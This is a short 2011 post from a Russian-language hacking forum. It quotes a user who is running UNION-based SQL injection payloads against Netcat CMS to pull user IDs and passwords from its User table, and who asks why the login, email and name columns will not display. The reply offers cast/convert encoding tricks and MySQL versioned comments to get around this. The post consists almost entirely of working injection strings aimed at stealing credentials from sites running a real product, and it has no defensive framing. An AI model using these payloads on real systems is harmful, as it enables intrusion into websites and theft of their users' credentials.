26.01.2011, 07:28
|
|
Новичок
Регистрация: 18.01.2011
Сообщений: 10
С нами:
8060726
Репутация:
0
|
|
Сообщение от noviyuser
Netcat CMS
-1+union+select+1,user_id+from+User+--+ показывает
-1+union+select+1,unhex(hex(password))+from+User+--+ показывает
-1+union+select+1,password+from+User+--+ показывает
-1+union+select+1,login+from+User+--+ НЕ показывает
-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает
Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
+union+select+1,cast(version()+as+binary),3,4,5,6
or
+union+select+1,convert(version()+using+latin1),3, 4,5,6
or
/*!...*/
|
|
|